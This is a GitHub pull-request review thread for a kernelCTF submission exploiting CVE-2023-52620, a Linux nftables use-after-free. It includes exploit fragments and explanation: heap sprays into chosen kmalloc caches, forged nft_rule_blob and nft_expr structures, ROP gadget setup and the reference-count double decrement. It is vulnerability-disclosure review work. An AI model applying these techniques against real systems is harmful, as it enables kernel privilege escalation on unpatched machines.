Add kernelCTF CVE-2023-52620_lts_cos_mitigation
google/security-research pull request #117
Opened 2024-07-22 08:28 UTC by mingi

2024-09-25 12:50 UTC, koczkatamas requested changes
Hey!

Thank you for your submission!

I've reviewed the submission, both the writeup and the code was very clear and readable, I consider this a high quality submission, congratulations!

I still requested few changes for extra details and some explanations - please see them below.

There should be 36 comments (don't worry, some of them are same just repeated for the 3 exploits), please **make sure you open all comments as the Github UI only shows 10 comments by default**.

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    for(int i = 0 ; i < 0x800; i++){
Comment here why you are spraying the `rule_dummy`, and what is the purpose of this spray and what would happen differently if you wouldn't do it?

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    struct nftnl_chain * chain_dummy = nftnl_chain_alloc();
Comment here what this `dummy` chain is used for (and/or choose a more expressive name).

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +char * chain_rop_name = "chain_rop_name_chain_rop_name_rop_name";
Comment here if the length of the `chain_rop_name_chain_rop_name_rop_name` value matters or not (`name` is allocated to the right cache). My currently understanding is that the length would matter for leaking data, but it does matter for the ROP chain part (or does it?).

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c
> +    data[0] = kmalloc_192;
Comment here what you structure are building here and which fields are you setting with `kmalloc_192` and `0`, also why you are using `0` (could other values satisfy the requirements)?

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +The ROP payload is stored in `chain->blob_gen_0` allocated in `kmalloc-cg-192` and the leaked heap address allocated in `kmalloc-cg-96`.
Mention here that on COS `kmalloc-cg-192` contains the fake `chain->blob_gen_0` aka `struct nft_rule_blob` including the fake `struct nft_expr` with the `ops` pointer pointing to the leaked `kmalloc-cg-96` address and then the first part of the ROP chain. Also detail that `kmalloc-cg-96` contains  the fake `struct nft_expr_ops` stored at the beginning and then the second part of the ROP chain.

Mention that where `RBX` points to when `eval()` is called. I think on LTS it points to the fake `struct nft_expr` (so to `kmalloc-cg-192` + `0x08`), while on COS it seems to be pointing to `kmalloc-cg-192` + `0x00`.

Also detail the differences between the ROP chains on LTS and COS (as they are different).

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    data[i++] = kbase + PUSH_RBX_POP_RSP;
Rename `PUSH_RBX_POP_RSP` to `PUSH_RBX_POP_RBP_RSP` as it is important that we are jumping to `rbx+0x08` (== `nft_expr+0x08` == `rop_chain_192+0x18`) here, not to `rbx+0x00`.

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`.
If I understand correctly **you are keeping the freed `nft_chain` in the freelist** and its content is not overwritten, so the `nft_chain.blob_gen_0` pointer still points to the freed `nft_rule_blob` structure which can be reallocated by spraying structures into the right cache. Is this assumption correct? First it was not clear if you spray `nft_rule_blob` or `nft_chain`.

If it is, then please explain these details here.

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c
> +    spray_table(data, KMALLOC_32_SIZE);
Comment here what you are overwriting here in `kmalloc-32-cg` and which step created that structure (add a comment to the step where you are creating that structure that this structure will get into `kmalloc-32-cg`).

2024-09-25 12:50 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the leaked heap address (LTS, COS
Make a comment somewhere why you chose `kmalloc-cg-192`, if I understand correctly, you could've chosen different cache too.

2024-09-25 13:21 UTC, koczkatamas commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +Then, when the gc is executed in `nft_set_commit_update`, `nft_trans_gc_catchall_sync` calls `nft_setelem_data_deactivate` to deactivate the objects mapped to the set element. As a result, the `nft_c
Can you comment here more about how the reference counter changes of the `nft_chain` object?

Let's consider the `chain_leak`: you use for the `immediate` expr, so the ref. counter becomes 1, then you set up the anonymous set and the lookup expression for the chain (ref count becomes 2), and then you wait for the timeout (ref count becomes 1) and then how the lookup expression is destroyed? Is it during the `del_chain` call?

If yes, then the ref count becomes 0 at this point but the `immediate` expr is still referencing the `nft_chain` object?

2024-11-20 05:13 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c
> +    sleep(3);
I removed it because it is unnecessary sleep.

2024-11-20 05:14 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c
> +    sleep(1);
I removed it because it is unnecessary sleep.

2024-11-20 05:14 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    sleep(3);
I removed it because it is unnecessary sleep.

2024-11-20 05:15 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    sleep(1000);
I removed it because it is unnecessary sleep.

2024-11-20 05:15 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c
> +    sleep(3);
I removed it because it is unnecessary sleep.

2024-11-20 05:17 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    data[i++] = 0x100;
I added a comment as follows.

`// nft_rule_blob.size > 0`

2024-11-20 05:17 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    data[i++] = 0x100;
I added a comment as follows.

`// nft_rule_blob.dlen > 0`

2024-11-20 05:18 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c
> +    data[i++] = 0x100;
I added a comment as follows.

`// nft_rule_blob.size > 0`

2024-11-20 05:18 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c
> +    data[i++] = 0x100;
I added a comment as follows.

`// nft_rule_blob.dlen > 0`

2024-11-20 05:19 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +    data[i++] = 0x100;
I added a comment as follows.

```
    // nft_rule_blob.size > 0
    data[i++] = 0x100;
    // nft_rule_blob.dlen > 0
    data[i++] = 0x100;
```

2024-11-20 05:19 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +    data[i++] = 0x100;
I added a comment as follows.

```
    // nft_rule_blob.size > 0
    data[i++] = 0x100;
    // nft_rule_blob.dlen > 0
    data[i++] = 0x100;
```

2024-11-20 05:19 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +    data[i++] = 0x100;
I added a comment as follows.

```
    // nft_rule_blob.size > 0
    data[i++] = 0x100;
    // nft_rule_blob.dlen > 0
    data[i++] = 0x100;
```

2024-11-20 05:19 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +    data[i++] = 0x100;
I added a comment as follows.

```
    // nft_rule_blob.size > 0
    data[i++] = 0x100;
    // nft_rule_blob.dlen > 0
    data[i++] = 0x100;
```

2024-11-20 05:20 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c
> +    data[i++] = kbase + PUSH_RBX_POP_RSP;
I added a comment as follows.

```
    // This structure overlaps the struct nft_rule
    // struct nft_rule {
    // struct list_head           list;                 /*     0    16 */
    // u64                        handle:42;            /*    16: 0  8 */
    // u64                        genmask:2;            /*    16:42  8 */
    // u64                        dlen:12;              /*    16:44  8 */
    // u64                        udata:1;              /*    16:56  8 */
    // unsigned char              data[];               /*    24     0 */

    // RBX contains the address of nft_rule
    // First two ROP chain elements are overwriting the nft_rule.list
    data[i++] = kbase + PUSH_RBX_POP_RSP_RBP;
```

2024-11-20 05:21 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c
> +    data[i++] = 0xffff | ((unsigned long) 0x8 << 44);
I added a comment as follows.

```
    // nft_rule.handle == 0xffff, nft_rule.dlen > 0
    data[i++] = 0xffff | ((unsigned long) 0x8 << 44);
```

2024-11-20 05:21 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    for(int i = 0 ; i < 0x800; i++){
I added a comment as follows.

```
    // create delay to trigger set element GC
    for(int i = 0 ; i < 0x800; i++){
        nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
        nftnl_rule_nlmsg_build_payload(nlh, rule_delay);
        mnl_nlmsg_batch_next(batch);

        handle++;
    }
```

2024-11-20 05:32 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    for(int i = 0 ; i < 0x8; i++){
I added a comment as follows. 

```
    // allocate struct nft_rule_blob to kmalloc-cg-256. Since trigger() is called twice before ROP, chain_rop contains 20 rules.
    for(int i = 0 ; i < 0xa; i++){
        nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
        nftnl_rule_nlmsg_build_payload(nlh, rule_dummy_rop);
        mnl_nlmsg_batch_next(batch);

        handle++;
    }
```

Because the trigger function is called twice, a total of 16 rules are created, allocating a size of 8 + 24 + (8 * 0x8) * 2 + 8 = 168 bytes. This part of the code is not clear.

I changed the target cache from `kmalloc-cg-192` to `kmalloc-cg-256` to store ROP payload in a single object. So total of 20 rules are sprayed to allocate object in `kmalloc-cg-256`.

2024-11-20 05:32 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    struct nftnl_chain * chain_dummy = nftnl_chain_alloc();
I changed the name dummy to delay.

2024-11-20 05:33 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +char * chain_rop_name = "chain_rop_name_chain_rop_name_rop_name";
I added a comment as follows.

```
// allocate chain->name to kmalloc-cg-16
char * chain_leak_name = "chain_leak_name";
// allocate chain->name to kmalloc-cg-64
char * chain_rop_name = "chain_rop_name_chain_rop_name_rop_name";
```

2024-11-20 05:35 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c
> +    data[0] = kmalloc_192;
I added a comment as follows.

```
    // create fake nft_chain.rules_gen_0
    uint64_t *data = malloc(1024);

    data[0] = kmalloc_192;
```

`data[1] = 0;` is not needed, so I deleted this line.

2024-11-20 05:36 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c
> +    data[i++] = kbase + PUSH_RBX_POP_RSP;
I renamed `PUSH_RBX_POP_RSP` to `PUSH_RBX_POP_RSP_RBP` because `RSP` is popped first.

2024-11-20 05:39 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the leaked heap address (LTS, COS
I added the details why I selected that slab cache.

2024-11-20 05:57 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +When the vulnerability is triggered, the reference counter of `nft_chain` is decremented twice. Therefore, we used `immediate expr` to create a dangling pointer referencing this victim `nft_chain`. A
I updated the description as you mentioned.

2024-11-20 06:00 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c
> +    spray_table(data, KMALLOC_32_SIZE);
I added a comment that it creates a fake `nft_chain.rules_gen_0`.

2024-11-20 06:06 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +Then, when the gc is executed in `nft_set_commit_update`, `nft_trans_gc_catchall_sync` calls `nft_setelem_data_deactivate` to deactivate the objects mapped to the set element. As a result, the `nft_c
The set element in the victim set that the lookup expr is binding to, not the lookup expr, is referencing the chain. If the gc is executed while deleting the lookup expr (deleting the lookup expr deactivates the bound set if it is an anonymous set), the set element will be deactivated twice, decreasing the reference count of the victim chain to twice.

I added a description about this to the `exploit.md`.

2024-11-20 06:18 UTC, mingi commented on pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/docs/exploit.md
> +The ROP payload is stored in `chain->blob_gen_0` allocated in `kmalloc-cg-192` and the leaked heap address allocated in `kmalloc-cg-96`.
I updated the description as you mentioned.

2024-11-20 06:21 UTC, mingi commented
Hello,

Thank you for reviewing my report and considering it as a high quality report.

I've updated the write-up base on your comments.

Please check it.

Thanks

2024-12-10 12:07 UTC, merged